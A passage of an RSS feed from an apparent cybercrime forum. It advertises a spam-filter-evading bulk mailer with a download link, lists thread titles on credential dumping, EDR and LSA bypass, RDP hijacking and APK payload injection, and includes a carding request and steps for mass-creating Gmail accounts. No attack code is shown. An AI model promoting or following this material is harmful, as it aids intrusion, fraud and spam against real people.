<div style="text-align: center;" class="mycode_align">➡️ <span style="font-weight: bold;" class="mycode_b"><span style="color: #00369b;" class="mycode_color">Unlimited header customization</span></span>: Personalize your emails with an unlimited number of headers for maximum flexibility.<br />
</div>
<div style="text-align: center;" class="mycode_align">➡️ <span style="font-weight: bold;" class="mycode_b"><span style="color: #00369b;" class="mycode_color">Reduced spam filtering risk</span></span>: The absence of specific headers can help lower the likelihood of emails being automatically flagged as spam.</div>]]></description>
			<content:encoded><![CDATA[<div style="text-align: center;" class="mycode_align"><span style="color: #9df9ff;" class="mycode_color"><span style="font-size: xx-large;" class="mycode_size"><span style="font-family: Arial Black;" class="mycode_font">DAFT SENDER OPEN SOURCE </span></span></span></div>
<div style="text-align: center;" class="mycode_align"><img src="https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Fpomf2.lain.la%2Ff%2Fe7bift8.jpg" loading="lazy"  width="500" height="200" alt="[Image: e7bift8.jpg]" class="mycode_img" /></div>
<div style="text-align: center;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b"><span style="font-size: xx-large;" class="mycode_size"><span style="color: #9a00b2;" class="mycode_color"><span style="font-family: Arial Black;" class="mycode_font"><a href="https://pixeldrain.com/u/j4XDsbF1" target="_blank" rel="noopener" class="mycode_url">DOWNLOAD</a></span></span></span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b"><span style="font-size: xx-large;" class="mycode_size"><span style="color: #9a00b2;" class="mycode_color"><a href="https://pixeldrain.com/u/j4XDsbF1" target="_blank" rel="noopener" class="mycode_url">https://pixeldrain.com/u/j4XDsbF1</a></span></span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b"><span style="color: #c10300;" class="mycode_color"><span style="font-size: x-large;" class="mycode_size">Key Features</span></span></span></div>
<div style="text-align: center;" class="mycode_align">✅ <span style="font-weight: bold;" class="mycode_b"><span style="color: #ff30dc;" class="mycode_color">Failure notifications</span></span>: Receive real-time alerts on Telegram when your emails fail to reach the inbox.</div>
<div style="text-align: center;" class="mycode_align">✅ <span style="font-weight: bold;" class="mycode_b"><span style="color: #ff30dc;" class="mycode_color">Continuous reporting</span></span>: Track the progress of your email sends directly from the Telegram dashboard, providing a detailed overview of your campaigns.</div>
<div style="text-align: center;" class="mycode_align">✅ <span style="font-weight: bold;" class="mycode_b"><span style="color: #ff30dc;" class="mycode_color">Remote control</span></span>: Manage your email sending with start and stop buttons available directly on the Telegram panel.</div>
<div style="text-align: center;" class="mycode_align">✅ <span style="font-weight: bold;" class="mycode_b"><span style="color: #f012be;" class="mycode_color">Easy configuration</span></span>: Quickly access and manage configuration settings through the Telegram dashboard.</div>
<div style="text-align: center;" class="mycode_align">✅ <span style="font-weight: bold;" class="mycode_b"><span style="color: #f012be;" class="mycode_color">Continuous inbox testing</span></span>: Monitor in real time whether your emails land in the inbox or are filtered into spam.<br />
</div>
<div style="text-align: center;" class="mycode_align">✅<span style="color: #f012be;" class="mycode_color"> <span style="font-weight: bold;" class="mycode_b">Automatic rotation</span></span>: Benefit from automatic rotation of sender names, sending addresses, and subject lines to improve delivery performance.</div>
<hr class="mycode_hr" />
<div style="text-align: center;" class="mycode_align"><span style="color: #c10300;" class="mycode_color"><span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Header Management</span></span></span></div>
<div style="text-align: center;" class="mycode_align">➡️ <span style="font-weight: bold;" class="mycode_b"><span style="color: #00369b;" class="mycode_color">Unlimited header customization</span></span>: Personalize your emails with an unlimited number of headers for maximum flexibility.<br />
</div>
<div style="text-align: center;" class="mycode_align">➡️ <span style="font-weight: bold;" class="mycode_b"><span style="color: #00369b;" class="mycode_color">Reduced spam filtering risk</span></span>: The absence of specific headers can help lower the likelihood of emails being automatically flagged as spam.</div>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[How To Extract & Decrypt GPP Passwords from SYSVOL]]></title>
			<link>https://pwnforums.st/Thread-How-To-Extract-Decrypt-GPP-Passwords-from-SYSVOL</link>
			<pubDate>Fri, 19 Dec 2025 20:53:50 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://pwnforums.st/member.php?action=profile&uid=415918">TheMekanic</a>]]></dc:creator>
			<guid isPermaLink="false">https://pwnforums.st/Thread-How-To-Extract-Decrypt-GPP-Passwords-from-SYSVOL</guid>
			<description><![CDATA[]]></description>
			<content:encoded><![CDATA[]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[How To Bypass EDR via GodPotato Token Theft (Admin To Syetem)]]></title>
			<link>https://pwnforums.st/Thread-How-To-Bypass-EDR-via-GodPotato-Token-Theft-Admin-To-Syetem</link>
			<pubDate>Fri, 19 Dec 2025 20:48:51 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://pwnforums.st/member.php?action=profile&uid=415918">TheMekanic</a>]]></dc:creator>
			<guid isPermaLink="false">https://pwnforums.st/Thread-How-To-Bypass-EDR-via-GodPotato-Token-Theft-Admin-To-Syetem</guid>
			<description><![CDATA[]]></description>
			<content:encoded><![CDATA[]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[✅ NTDS.dit Extraction: Dumping the Domain Database]]></title>
			<link>https://pwnforums.st/Thread-%E2%9C%85-NTDS-dit-Extraction-Dumping-the-Domain-Database</link>
			<pubDate>Fri, 19 Dec 2025 20:42:24 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://pwnforums.st/member.php?action=profile&uid=415918">TheMekanic</a>]]></dc:creator>
			<guid isPermaLink="false">https://pwnforums.st/Thread-%E2%9C%85-NTDS-dit-Extraction-Dumping-the-Domain-Database</guid>
			<description><![CDATA[<div class="hidden-content">
	<div class="hidden-content-title">
		<strong>Hidden Content</strong><br />
	</div>
	<div class="hidden-content-body">
		You must <a href="https://pwnforums.st/member.php?action=register">register</a> or <a href="https://pwnforums.st/member.php?action=login">login</a> to view this content.<br />
	</div>
</div>]]></description>
			<content:encoded><![CDATA[<div class="hidden-content">
	<div class="hidden-content-title">
		<strong>Hidden Content</strong><br />
	</div>
	<div class="hidden-content-body">
		You must <a href="https://pwnforums.st/member.php?action=register">register</a> or <a href="https://pwnforums.st/member.php?action=login">login</a> to view this content.<br />
	</div>
</div>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[✅ Bypassing LSA Protection (PPL) using Trusted Drivers]]></title>
			<link>https://pwnforums.st/Thread-%E2%9C%85-Bypassing-LSA-Protection-PPL-using-Trusted-Drivers</link>
			<pubDate>Fri, 19 Dec 2025 20:36:07 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://pwnforums.st/member.php?action=profile&uid=415918">TheMekanic</a>]]></dc:creator>
			<guid isPermaLink="false">https://pwnforums.st/Thread-%E2%9C%85-Bypassing-LSA-Protection-PPL-using-Trusted-Drivers</guid>
			<description><![CDATA[<div class="hidden-content">
	<div class="hidden-content-title">
		<strong>Hidden Content</strong><br />
	</div>
	<div class="hidden-content-body">
		You must <a href="https://pwnforums.st/member.php?action=register">register</a> or <a href="https://pwnforums.st/member.php?action=login">login</a> to view this content.<br />
	</div>
</div>]]></description>
			<content:encoded><![CDATA[<div class="hidden-content">
	<div class="hidden-content-title">
		<strong>Hidden Content</strong><br />
	</div>
	<div class="hidden-content-body">
		You must <a href="https://pwnforums.st/member.php?action=register">register</a> or <a href="https://pwnforums.st/member.php?action=login">login</a> to view this content.<br />
	</div>
</div>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[How To Perform RDP Hijacking: Stealing Active Sessions (No Passwords)]]></title>
			<link>https://pwnforums.st/Thread-How-To-Perform-RDP-Hijacking-Stealing-Active-Sessions-No-Passwords</link>
			<pubDate>Fri, 19 Dec 2025 19:03:28 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://pwnforums.st/member.php?action=profile&uid=415918">TheMekanic</a>]]></dc:creator>
			<guid isPermaLink="false">https://pwnforums.st/Thread-How-To-Perform-RDP-Hijacking-Stealing-Active-Sessions-No-Passwords</guid>
			<description><![CDATA[<div class="hidden-content">
	<div class="hidden-content-title">
		<strong>Hidden Content</strong><br />
	</div>
	<div class="hidden-content-body">
		You must <a href="https://pwnforums.st/member.php?action=register">register</a> or <a href="https://pwnforums.st/member.php?action=login">login</a> to view this content.<br />
	</div>
</div>]]></description>
			<content:encoded><![CDATA[<div class="hidden-content">
	<div class="hidden-content-title">
		<strong>Hidden Content</strong><br />
	</div>
	<div class="hidden-content-body">
		You must <a href="https://pwnforums.st/member.php?action=register">register</a> or <a href="https://pwnforums.st/member.php?action=login">login</a> to view this content.<br />
	</div>
</div>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[✅ How To Inject Payloads into Legitimate APKs]]></title>
			<link>https://pwnforums.st/Thread-%E2%9C%85-How-To-Inject-Payloads-into-Legitimate-APKs</link>
			<pubDate>Wed, 17 Dec 2025 21:25:54 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://pwnforums.st/member.php?action=profile&uid=415918">TheMekanic</a>]]></dc:creator>
			<guid isPermaLink="false">https://pwnforums.st/Thread-%E2%9C%85-How-To-Inject-Payloads-into-Legitimate-APKs</guid>
			<description><![CDATA[]]></description>
			<content:encoded><![CDATA[]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[✅ Modern WPA3/WPA2 Cracking Method]]></title>
			<link>https://pwnforums.st/Thread-%E2%9C%85-Modern-WPA3-WPA2-Cracking-Method</link>
			<pubDate>Wed, 17 Dec 2025 21:19:14 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://pwnforums.st/member.php?action=profile&uid=415918">TheMekanic</a>]]></dc:creator>
			<guid isPermaLink="false">https://pwnforums.st/Thread-%E2%9C%85-Modern-WPA3-WPA2-Cracking-Method</guid>
			<description><![CDATA[]]></description>
			<content:encoded><![CDATA[]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[I am looking for a carding guide for beginners]]></title>
			<link>https://pwnforums.st/Thread-I-am-looking-for-a-carding-guide-for-beginners</link>
			<pubDate>Wed, 30 Jul 2025 10:12:17 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://pwnforums.st/member.php?action=profile&uid=471833">Isa_bella</a>]]></dc:creator>
			<guid isPermaLink="false">https://pwnforums.st/Thread-I-am-looking-for-a-carding-guide-for-beginners</guid>
			<description><![CDATA[Any pdf file to share is appreciated]]></description>
			<content:encoded><![CDATA[Any pdf file to share is appreciated]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[How to create unlimited gmail accounts]]></title>
			<link>https://pwnforums.st/Thread-How-to-create-unlimited-gmail-accounts</link>
			<pubDate>Mon, 28 Jul 2025 20:27:40 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://pwnforums.st/member.php?action=profile&uid=470405">ucy</a>]]></dc:creator>
			<guid isPermaLink="false">https://pwnforums.st/Thread-How-to-create-unlimited-gmail-accounts</guid>
			<description><![CDATA[<span style="color: #dd4030;" class="mycode_color"><span style="font-family: Roboto, sans-serif;" class="mycode_font">1. Get a phone or an emulator(preferably android phone)</span></span><br />
<span style="color: #dd4030;" class="mycode_color"><span style="font-family: Roboto, sans-serif;" class="mycode_font">2. Go to gmail app</span></span><br />
<span style="color: #dd4030;" class="mycode_color"><span style="font-family: Roboto, sans-serif;" class="mycode_font">3. Use wifi or 4g no vpn or proxy</span></span><br />
<span style="color: #dd4030;" class="mycode_color"><span style="font-family: Roboto, sans-serif;" class="mycode_font">4. Create gmail accs</span></span>]]></description>
			<content:encoded><![CDATA[<span style="color: #dd4030;" class="mycode_color"><span style="font-family: Roboto, sans-serif;" class="mycode_font">1. Get a phone or an emulator(preferably android phone)</span></span><br />
<span style="color: #dd4030;" class="mycode_color"><span style="font-family: Roboto, sans-serif;" class="mycode_font">2. Go to gmail app</span></span><br />
<span style="color: #dd4030;" class="mycode_color"><span style="font-family: Roboto, sans-serif;" class="mycode_font">3. Use wifi or 4g no vpn or proxy</span></span><br />
<span style="color: #dd4030;" class="mycode_color"><span style="font-family: Roboto, sans-serif;" class="mycode_font">4. Create gmail accs</span></span>]]></content:encoded>
		</item>
	</channel>
</rss>